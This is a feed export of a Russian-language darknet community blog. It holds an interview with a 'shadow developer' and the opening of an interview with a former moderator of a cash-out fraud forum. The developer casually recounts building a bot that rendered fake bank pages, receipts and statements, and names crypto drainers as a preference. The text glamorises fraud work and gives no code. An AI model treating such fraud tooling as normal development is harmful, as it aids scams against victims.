<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>Parabellum Clan</title><subtitle>Это не просто сообщество, а прогрессивное и динамичное Darknet Community, объединяющее лучших экспертов в теневой сфере!</subtitle><author><name>Parabellum Clan</name></author><id>https://teletype.in/atom/parabellum_clan</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/parabellum_clan?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/parabellum_clan?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-05T03:34:53.965Z</updated><entry><id>parabellum_clan:rare_story</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/rare_story?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>#МОЙПУТЬ. Теневой разработчик</title><published>2025-07-08T08:21:48.450Z</published><updated>2025-07-08T16:36:15.136Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/ad/51/ad51212b-8435-4b61-ad74-a688b2a3db00.png"></media:thumbnail><category term="interv-yu" label="Интервью"></category><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/f2/b8/f2b82d51-455c-46ae-9f57-dc36c2885cc1.png&quot;&gt;Тепло приветствуем, дамы и господа! С Вами вновь Сообщество экспертов - Parabellum Clan и его слуга Генри Чинаски. Сегодня мы запускаем рубрику #мойпуть - серия вдохновляющих историй от людей, которые прошли свой путь —  от первых шагов до собственных побед в теневом секторе. В каждом выпуске наш гость будет делиться опытом, вызовами и тем, что помогло ему дойти до цели.</summary><content type="html">
  &lt;figure id=&quot;1Loc&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f2/b8/f2b82d51-455c-46ae-9f57-dc36c2885cc1.png&quot; width=&quot;2880&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;mU8O&quot;&gt;Тепло приветствуем, дамы и господа! С Вами вновь Сообщество экспертов - &lt;a href=&quot;https://t.me/+ize7XDFxbMNjNDg0&quot; target=&quot;_blank&quot;&gt;Parabellum Clan&lt;/a&gt; и его слуга &lt;a href=&quot;http://t.me/god_freska&quot; target=&quot;_blank&quot;&gt;Генри Чинаски.&lt;/a&gt; Сегодня мы запускаем рубрику #мойпуть - серия вдохновляющих историй от людей, которые прошли свой путь —  от первых шагов до собственных побед в теневом секторе. В каждом выпуске наш гость будет делиться опытом, вызовами и тем, что помогло ему дойти до цели.&lt;/p&gt;
  &lt;p id=&quot;MACH&quot;&gt;Сегодняшний наш гость:&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;m7Ho&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://t.me/Rare_c0de&quot; target=&quot;_blank&quot;&gt;👾 Rare&lt;/a&gt;  — не просто разработчик. Это человек, в котором сочетается технарская одержимость, врождённая порядочность и редкое умение держать слово в любой среде. Он не гонится за громкими тайтлами и хайпом, но именно к нему приходят, когда проект сложный, сроки горят, а доверять можно только проверенным.&lt;/strong&gt;&lt;/h3&gt;
    &lt;h3 id=&quot;14gu&quot;&gt;&lt;strong&gt; Мы бы могли сказать “лучший из тех, с кем доводилось работать” — и это не будет преувеличением. Спокойный, умный и системный — он не просто пишет код, он строит рабочие системы, которые живут годами.&lt;/strong&gt;&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;milx&quot;&gt;&lt;strong&gt;Rare: Всем привет! Рад поучаствовать в этой рубрике и, возможно, быть полезным тем, кто только начинает свой путь или уже в процессе. Я не считаю себя каким-то гуру, но за последние годы через мои руки прошло достаточно проектов, чтобы наработать понимание, как устроена эта сфера — изнутри, без прикрас.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;uzCt&quot;&gt;&lt;strong&gt;Если мой опыт поможет кому-то не наступить на те же грабли или просто даст мотивацию двигаться дальше — значит, не зря пришёл. Поехали.&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;aHdO&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5b/f9/5bf9c37b-b6d4-49a6-9e64-ce93c81e7a86.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;Nupo&quot;&gt;Начнём с рубрики #мойпуть: как ты попал в эту сферу и с чего начался твой путь по ту сторону кода? &lt;/blockquote&gt;
  &lt;p id=&quot;Jll2&quot;&gt;&lt;strong&gt;Еще будучи школьником понимал, что не хочу зарабатывать физическим трудом ибо познал на себе как это. Лес не валил в Сибири, конечно, но опыта хватило, что бы понять это твёрдо и бесповоротно. Первая официальная работа в ИТ, зп долларов 600, я молод и хочу больше - иду на пиратскую бухту и нахожу своего первого клиента WalletStoreAdmin (если читаешь - шатаут, бро). На тот момент я был совсем нубом, но смог помочь ему там, где не смогли помочь другие, опытные кодеры. Это дало сильный буст по морали + заработал 1/6 того, что зарабатываю за месяц. Далее сарафанное радио и пошло поехало)&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;P8K4&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;VdAz&quot;&gt;Первым делом хочу спросить об образовании. У многих до сих пор существует &lt;br /&gt;стереотипы, что чтобы стать разработчиком, нужно пройти «огонь, воду и медные трубы» в  виде сложного технического вуза, практик и работы. Так ли это на самом деле? &lt;/blockquote&gt;
  &lt;p id=&quot;Pa8U&quot;&gt; &lt;strong&gt;Одно из образований(первое) - админ компьютерных сетей, но нас учили тому, что сейчас в 3-ем классе детям преподают. Не обязательно я думаю ВУЗ заканчивать по специальности. Нужно иметь сильный интерес, понимание &amp;quot;зачем это всё&amp;quot; и потихоньку двигаться к цели. Образование даст буст и крепкий фундамент (нормальное образование), но нет такого, что без образования тебя к коду не допустят, как хирурга, например. &lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;figure id=&quot;FgPq&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/31/7b/317b1856-9395-464c-95da-3eeed6cdd233.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;NU7E&quot;&gt;Да, сейчас тенденция на &amp;quot;экспресс курсы&amp;quot;, которые выдают за образование. Печально&lt;/blockquote&gt;
  &lt;blockquote id=&quot;raEW&quot;&gt;Давай поговорим про то, с  чего ты начал? Сайты, софты, боты — или сразу что-то “грязное”? &lt;/blockquote&gt;
  &lt;p id=&quot;ipQZ&quot;&gt;&lt;strong&gt;Друг задумал бизнес, я влетел с двух ног на помощь, взялся делать всю техничку. Сначала собрал сайт со сбором заявок, потом начал лепить CRM систему с ботом в тележке для манипуляций с заказами, сотрудниками. Для первого опыта - звучит ебануто, особенно учитывая, что спустя 6 лет эта CRM система до сих пор жива, работает и приносит деньги. &lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;wSPa&quot;&gt;Ты заходил в одиночку или с кем-то? Насколько важен “наставник” на старте? &lt;/blockquote&gt;
  &lt;p id=&quot;oank&quot;&gt;&lt;strong&gt;Я начинал сам. Из тогдашнего ближайшего окружения 0 человек в схожей сфере. Наставник - это кул, я считаю. Если бы у меня на старте был такой человек - я был бы только рад. &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;CT3N&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;zYDz&quot;&gt;Какой у тебя сейчас стек? Есть любимые языки, которые используешь чаще всего? &lt;/blockquote&gt;
  &lt;p id=&quot;9BdK&quot;&gt;&lt;strong&gt;Стэк сильно размыт стал. В большинстве своём зависит от задачи. Но начинал с php, потом питончик, дальше JS. &lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;dYXv&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a9/a7/a9a7247a-782f-4bd6-9d02-5736b35f32ef.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;WkAt&quot;&gt;Белые заказы — это прошлое или до сих пор бывают? &lt;/blockquote&gt;
  &lt;p id=&quot;zvuK&quot;&gt;&lt;strong&gt;Да, бывают, я их делаю с кайфом. Люблю кодить и не брезгую работой, только если она не идёт в разрез моим принципам. &lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;7Dms&quot;&gt;Без ТЗ — результат ХЗ — всё верно?) &lt;/blockquote&gt;
  &lt;p id=&quot;xsNY&quot;&gt;&lt;strong&gt;Ситуативно) Если у клиента есть понимание примерное чего он хочет, хотя бы процентов на 10, рассказав это мне я уже +- накидываю мысленно ТЗ и понимаю как и что я буду делать. Так же я прописываю сам себе ТЗ по пунктам в чек листе, по которому потом веду разработку. В то же время есть ребята, которые только осваивают нейронки и не до конца понимают, что буквально их воспринимать не стоит, кидают мне а4 ТЗ, где половина притянута за уши и вовсе не нужна. Хорошее ТЗ - кул, но если нет - не страшно, главное иметь картинку финальную перед глазами и уметь ее описать)&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;4Vex&quot;&gt;Помнишь свою первую оплату? Что это был за проект и сколько с него капнуло? &lt;/blockquote&gt;
  &lt;p id=&quot;dgap&quot;&gt;&lt;strong&gt;Да-да, тот самый WalletStoreAdmin, бот с отрисовкой лк банков, чеков, выписок... +- 100$.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;eedH&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;ArcM&quot;&gt;Есть ли у тебя “Ред Флаги”? Что ты не берёшь в работу ни при каких условиях? &lt;/blockquote&gt;
  &lt;p id=&quot;JegJ&quot;&gt;&lt;strong&gt;О даа, есть. Например &amp;quot;Тут изи я бы сам сделал, но лень&amp;quot;, &amp;quot;Та тут работы на полчаса....&amp;quot;. А вот буквально взял с диалога вчерашнего &amp;quot;Дорогая тема?мне сказали кодеры за копейки делают&amp;quot;. Таких ребят стараюсь не мучать и не разбивать их картинк мира.&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;figure id=&quot;FzCl&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2a/ee/2aee79b0-2d95-4da2-a61b-550675ab0567.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;sraN&quot;&gt;Да, к сожалению многие думают, что разработка тех же ботов стоит копейки, нередко можно найти &amp;quot;Заказчиков&amp;quot; с бюджетом 50$-100$)) &lt;/blockquote&gt;
  &lt;blockquote id=&quot;R6Ly&quot;&gt;Была ли задача, которая морально выбила из колеи? Что ты сделал — отказался, доделал, передал? &lt;/blockquote&gt;
  &lt;p id=&quot;RuCk&quot;&gt;&lt;strong&gt; Да, было парочку таких. Всё в основном завязано на людях. Из недавнего - обратился персонаж, мол его кинули с софтом, продали не рабочий. Прикол в том, что это был мой же софт, который я пару месяцев назад сделал человеку, который не доплатил 50$ и пропал. Софт работал, после изменений на сайте, с которым велась работа, - перестал, нужны были правки. Человек, судя по смс, был в печали. Проебал деньги, кинули, инкам потенциальный накрылся ибо софт не ворк. Среди ночи сел за ворк, что бы помочь ибо ему срочно надо, работа стоит. Помог и что, как думаете? Чел получил софт и пропал. Ублюдки выбивают из колеи, а не работа и заказы.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;DQde&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;0Rd7&quot;&gt;Бывает, что клиент приходит с задачей, а ты такой — “это выше моих принципов”? Или потолка нет? &lt;/blockquote&gt;
  &lt;p id=&quot;9aTI&quot;&gt;&lt;strong&gt;Да, бывает. По некоторым ГЕО не веду разработку вовсе. Если задача связана со скамом пожилых - тоже мимо.&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;i59w&quot;&gt;Самый сложный проект в твоей практике — что это было? Сколько он обошёлся &lt;br /&gt;клиенту? &lt;/blockquote&gt;
  &lt;p id=&quot;ruYT&quot;&gt;&lt;strong&gt;Инвестиционный проект с акциями и стэйкингом. 8к+ за 2 месяца разработки. &lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;mdjP&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/1e/a8/1ea84e14-647a-4f12-9ce1-43db25259826.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;y2Mk&quot;&gt; Были кейсы с % от дохода, долей, роялти? Что выгоднее — фикс или доля? &lt;/blockquote&gt;
  &lt;p id=&quot;dPJ6&quot;&gt;&lt;strong&gt;Да, были. Во всех смыслах выгоднее доля - больше мотивации и $ профита, но не с каждым клиентом можно работать так. Обычно первые заказы клиента делаем за фикс, далее по обоюдному согласию можем перейти на %. &lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;ZQju&quot;&gt;У тебя есть прайс или считаешь от задачи? &lt;/blockquote&gt;
  &lt;p id=&quot;6LNC&quot;&gt;&lt;strong&gt;В основном от задачи отталкиваюсь. Бывают запросы аля &amp;quot;братан сколько стоит сделать бота&amp;quot; - на этом всё, тут никакой прайс лист не поможет)&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;PjlA&quot;&gt;Почему, по-твоему, теневая разработка всегда дороже? &lt;/blockquote&gt;
  &lt;p id=&quot;FuJI&quot;&gt;&lt;strong&gt;Я бы не сказал, что она дороже. Белый бизнес тоже платит много, но в теневой сфере чуть интереснее)&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;cjvx&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;wKjC&quot;&gt;Что ты делаешь с проблемными клиентами? Какой у тебя “протокол” на случай &lt;br /&gt;шизы клиента? &lt;/blockquote&gt;
  &lt;p id=&quot;DEVy&quot;&gt;&lt;strong&gt;Хмм, с такими ребятами я стараюсь не начинать работу. Но если и начал, то всё по ситуации. Мне проще манибэкнуть, чем тратить нервы и время. Такие случаи были.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;e2bq&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;HlQU&quot;&gt;Самый жёсткий факап с клиентом — расскажи, если можно. &lt;/blockquote&gt;
  &lt;p id=&quot;3jt4&quot;&gt;&lt;strong&gt; Самый жёсткий, наверное, это когда всё вроде кул, сделал проект одному клиенту, затем второму, свои проектики почекал, а потом сервера со всеми проектами падают безвозвратно и всё. Этот факап ты мог наблюдать лично) &lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;figure id=&quot;vrlw&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7b/5f/7b5fa607-6d1e-4618-9156-c2654054fa5a.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;oFzT&quot;&gt;В нашем деле никуда без этого. Всегда с пониманием к таким Форс-Мажорам. Всё позади)&lt;/blockquote&gt;
  &lt;blockquote id=&quot;9NXa&quot;&gt;Сколько ты в игре? Что изменилось за это время — рынок, расценки, стиль &lt;br /&gt;общения? &lt;/blockquote&gt;
  &lt;p id=&quot;Ws66&quot;&gt;&lt;strong&gt;В игре с 20го года, что ли. Кодеры размножаются так же быстро, как крепнут нейронки, а в остальном, я думаю, всё +- так же. &lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;mRYj&quot;&gt;Какие техники безопасности ты считаешь обязательными? Обфускация, крипто, &lt;br /&gt;виртуалки, прокси — что must? &lt;/blockquote&gt;
  &lt;p id=&quot;GISK&quot;&gt;&lt;strong&gt;Свои впн конфиги на пк и на маршрутизаторе. Но признаться честно - половину времени всей своей деятельности я вообще не парился об этом. Объективно понимал, кому я нужен то? Сейчас всё иначе, следите за своей анонимностью и безопасностью в интернете.&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;Wl6c&quot;&gt;Что для тебя оказалось сложнее всего: техника, люди, психология, анонимность? &lt;/blockquote&gt;
  &lt;p id=&quot;hvPu&quot;&gt;&lt;strong&gt;Люди, техника и психология - по убыванию. Техника относительно предсказуема, а от людей можно ждать чего угодно) &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;5Fi0&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;euoo&quot;&gt;Если убрать деньги, хайп и внешку — тебе реально нравится то, что ты делаешь? &lt;/blockquote&gt;
  &lt;p id=&quot;MgaJ&quot;&gt;&lt;strong&gt;Да, супер. Это своего рода творчество, но в другой форме. Я и строитель и художник. И прораб и сам раб иногда хД. Ну и в конце концов я не спину гну (хотя она иногда болит долго сидеть за пк), а комфортно воркаю когда хочу и где хочу.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;nHvV&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;nyX6&quot;&gt;Были моменты, когда хотелось всё бросить? Белая разработка не манит? &lt;/blockquote&gt;
  &lt;p id=&quot;iypj&quot;&gt;&lt;strong&gt;Были и такие моменты. Наверное, у всех подобного рода мысли проскакивают вне зависимости от характера деятельности) Небольшой тильт и дальше ворк) Белая разработка не манит, она присутствует) Если в голову придёт то, чем бы я мог заниматься в белую, это приносило бы мне крутые эмоции и хороший доход - с двух ног туда залечу.&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;TCn0&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d3/15/d3158c8c-0e63-472b-9cc6-ed536ac3da9e.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;Kvs2&quot;&gt; Что дала тебе эта среда, чего не даст ни один вуз? &lt;/blockquote&gt;
  &lt;p id=&quot;eFI9&quot;&gt;&lt;strong&gt;В среду я обычно делаю дельты и грудь... но если серьезно - два друга, несколько товарищей, много хороших знакомых. Много опыта и понимания того, как человеческая натура устроена. Целая куча опыта практического - этого в ВУЗе не шибко много, думаю. Тут больше людей, которые думают не стандартно, вне шаблонов. Мы видим закономерности, ищем обходы.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;GraF&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;6GUb&quot;&gt;Чем живёшь сейчас? Свои проекты или только разработка под клиентов? &lt;/blockquote&gt;
  &lt;p id=&quot;zEe5&quot;&gt;&lt;strong&gt;Заказами, работающими проектами. Свои проекты потихоньку пишутся - после недавнего вайпа серверов некоторые только начал восстанавливать заново. &lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;sBEn&quot;&gt;Можно ли сейчас начать с нуля и быстро выйти на коммерцию? Твои советы &lt;br /&gt;новичкам. &lt;/blockquote&gt;
  &lt;p id=&quot;Wxaz&quot;&gt;&lt;strong&gt;Да, вполне. Нейронки очень сильно бустят абсолютно всё. Любые &amp;quot;новые&amp;quot; для человека технологии изи расскажет нейросеть, если у тебя есть желание - запоминай, воплощай в реальность, собирай отзывы и так с каждой итерацией всё ближе и ближе к успеху)&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;1mDN&quot;&gt;В какую зону лучше не лезть даже опытному кодеру? Есть “чёрные дыры” в этом &lt;br /&gt;рынке? &lt;/blockquote&gt;
  &lt;p id=&quot;61tb&quot;&gt;&lt;strong&gt;Опытный кодер, я думаю, с любой ситуации сможет выйти. Главное не переступать через себя и свои принципы, не связываться с токсиками и слишком маленькими ребятами.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;VkSP&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;D6tU&quot;&gt;&lt;strong&gt;Блиц-опрос: один вопрос — два варианта, без раздумий и пояснений. Выбирай сердцем.&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;NEyl&quot;&gt;&lt;strong&gt;Хорошо)&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;4kiY&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;a1AZ&quot;&gt;1. Самоучка или С дипломом?&lt;/blockquote&gt;
  &lt;p id=&quot;Rldq&quot;&gt;&lt;strong&gt;Самоучка&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;Rwn8&quot;&gt;2. Одиночка или Команда &lt;/blockquote&gt;
  &lt;p id=&quot;jUYC&quot;&gt;&lt;strong&gt;Одиночка&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;Lqem&quot;&gt;3. 500$ быстро  или 3000$ с риском &lt;/blockquote&gt;
  &lt;p id=&quot;4dg0&quot;&gt;&lt;strong&gt;3к с риском&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;SdAl&quot;&gt;4. Тезер (USDT)  или Биток (BTC) &lt;/blockquote&gt;
  &lt;p id=&quot;ChZV&quot;&gt;&lt;strong&gt; Тез&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;u4un&quot;&gt;5. Анонимность  или Репутация  &lt;/blockquote&gt;
  &lt;p id=&quot;y9vE&quot;&gt;&lt;strong&gt;Репутация&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;6wdw&quot;&gt;6. Фронт  или Бэк  &lt;/blockquote&gt;
  &lt;p id=&quot;HCRX&quot;&gt;&lt;strong&gt;Бэк&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;k2W0&quot;&gt;7. Фикс  или Процент &lt;/blockquote&gt;
  &lt;p id=&quot;9nrT&quot;&gt;&lt;strong&gt;Фикс&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;Oumh&quot;&gt;8. Фишинг  или Дрейнер  &lt;/blockquote&gt;
  &lt;p id=&quot;KYyB&quot;&gt;&lt;strong&gt;Дрейнер&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;r7J7&quot;&gt;9. Форумы  или Телега&lt;/blockquote&gt;
  &lt;p id=&quot;eIhn&quot;&gt;&lt;strong&gt;ТГ&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;krTR&quot;&gt;10. Кодить вечно  или Соскочить вовремя &lt;/blockquote&gt;
  &lt;p id=&quot;YtSF&quot;&gt;&lt;strong&gt;Пожалуй соскочить вовремя&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;d3f2&quot;&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;lm5J&quot;&gt;Спасибо тебе за честные ответы, здравый тон и без иллюзий. В мире, где все кричат про изи мани и быстрые входы, особенно важно слышать голос тех, кто реально прошёл путь — с ошибками, тильтом, ростом и принципами. Такие разговоры — не просто контент, а точка опоры для тех, кто только заходит в игру или давно в ней, но хочет держаться на плаву без лишнего шума. Уважение и респект. Еще раз спасибо, Рейр)&lt;/blockquote&gt;
  &lt;p id=&quot;6gUB&quot;&gt;&lt;strong&gt;И вам Друзья, взаимно!&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;ccJu&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/73/5c/735cf41a-13d9-497a-91a2-c65e23dc07ae.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;Sb5C&quot;&gt;💬 Поддержите проект&lt;/h3&gt;
  &lt;p id=&quot;FV7D&quot;&gt;Если материал был вам полезен — поставьте лайк, поделитесь в каналах с коллегами или друзьями.&lt;/p&gt;
  &lt;p id=&quot;Eumf&quot;&gt;🧠 Лучшая благодарность — это развитие проекта вместе с вами. &lt;a href=&quot;http://t.me/dark_gov&quot; target=&quot;_blank&quot;&gt;Вступайте в наши ряды&lt;/a&gt; и следите за новыми выпусками — мы не остановимся.&lt;/p&gt;
  &lt;p id=&quot;Jwgm&quot;&gt;&lt;em&gt;Спасибо, что остаетесь на волне.&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;KDZv&quot;&gt;Поддержка проекта:&lt;/p&gt;
  &lt;blockquote id=&quot;Wf9S&quot;&gt;TRC20: TLSttEVXCDSJWWZ775cUvfrafYYgz2Ha4Q                                                  BTC: bc1qvrwn96agxtmyflxkjsefazzjvsp2gnc8e58zmg&lt;/blockquote&gt;

</content></entry><entry><id>parabellum_clan:tfs_story</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/tfs_story?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>DarkMoney: 12 лет верности и один выстрел в спину</title><published>2025-06-17T09:47:08.441Z</published><updated>2025-06-17T09:49:03.479Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/87/57/8757d3c7-9371-432f-8152-9cb744e8f7a9.png"></media:thumbnail><category term="interv-yu" label="Интервью"></category><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/73/5f/735fc8da-13ab-40de-ba2b-dd10749c968c.png&quot;&gt;Тепло приветствуем, дамы и господа! С Вами вновь Сообщество экспертов - Parabellum Clan и его слуга Генри Чинаски. Сегодня мы погрузимся в историю монопольного форума на рынке обнала. Наш путеводитель сегодняшнего рассказа посвятил почти 12.5 лет проекту. Это история о человеке, который не только сделал карьеру, но и пережил её с честью. Уходы, сложные решения, отстранения — всё это было. Но остались принципы, уважение комьюнити и понимание, куда он идёт дальше.</summary><content type="html">
  &lt;figure id=&quot;Beof&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/73/5f/735fc8da-13ab-40de-ba2b-dd10749c968c.png&quot; width=&quot;1033&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;mBDT&quot;&gt;Тепло приветствуем, дамы и господа! С Вами вновь Сообщество экспертов - &lt;strong&gt;&lt;a href=&quot;https://t.me/+ize7XDFxbMNjNDg0&quot; target=&quot;_blank&quot;&gt;Parabellum Clan&lt;/a&gt;&lt;/strong&gt; и его слуга &lt;a href=&quot;http://t.me/god_freska&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Генри Чинаски.&lt;/strong&gt;&lt;/a&gt; Сегодня мы погрузимся в историю монопольного форума на рынке обнала. Наш путеводитель сегодняшнего рассказа посвятил почти 12.5 лет проекту. Это история о человеке, который не только сделал карьеру, но и пережил её с честью. Уходы, сложные решения, отстранения — всё это было. Но остались принципы, уважение комьюнити и понимание, куда он идёт дальше.&lt;/p&gt;
  &lt;p id=&quot;djzh&quot;&gt;Сегодняшний наш гость:&lt;/p&gt;
  &lt;section&gt;
    &lt;p id=&quot;Aw1w&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://t.me/tfs_support&quot; target=&quot;_blank&quot;&gt;TFS — &lt;/a&gt;Человек, который когда-то пришёл на форум в поисках решения — и остался здесь на 12 с половиной лет. Освоился, впитал правила старой школы, выстроил репутацию, стал &lt;a href=&quot;https://w98.darkmoney.in/members/tfs-3151/&quot; target=&quot;_blank&quot;&gt;Проверенным Продавцом&lt;/a&gt; и реализовал себя. Прожил все этапы — от новичка до модератора-арбитра. &lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;bSwH&quot;&gt;&lt;strong&gt;Делал паузы, но каждый раз возвращался в строй, оставаясь верным форуму. Один из тех, кто помнит форум до рекламы, до гарантов и до &amp;quot;лечилова&amp;quot;. Когда правила писались действиями, а не постами. Ушёл не по приказу, а по совести. И всё ещё знает, кто есть кто.&lt;/strong&gt;&lt;/p&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;WB7E&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ac/6a/ac6a56e3-613f-4e5c-afcf-e7a254c05e16.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;blockquote id=&quot;lzsW&quot;&gt;Как Вы пришли на ДаркМани? Помните своё первое знакомство с форумом, каким оно было?&lt;/blockquote&gt;
  &lt;p id=&quot;pGzJ&quot;&gt;&lt;strong&gt;Помню, нашел его в конце 2012-го года поиском по запросу &amp;quot;обналичка&amp;quot;. Пару месяцев был читателем, потом в начале 2013-го зарегался, ну и пошло-поехало )))&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;yRkt&quot;&gt;&lt;strong&gt;Вы проработали почти 12.5 лет на форуме. Была ли у Вас карьерная лестница. Было тяжело?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;Ovon&quot;&gt;&lt;strong&gt;Была. В какой-то момент мне предложили должность Модератора, в которой я находился основное время. Потом, если не ошибаюсь пару лет назад стал уже Арбитром.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;Hs0K&quot;&gt;&lt;strong&gt;У Вас был трудовый оффер от Администрации?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;ZmKS&quot;&gt;&lt;strong&gt;Нет, никаких договорных отношений или каких-либо трудовых формальностей на дарке я не застал&lt;/strong&gt;&lt;/p&gt;
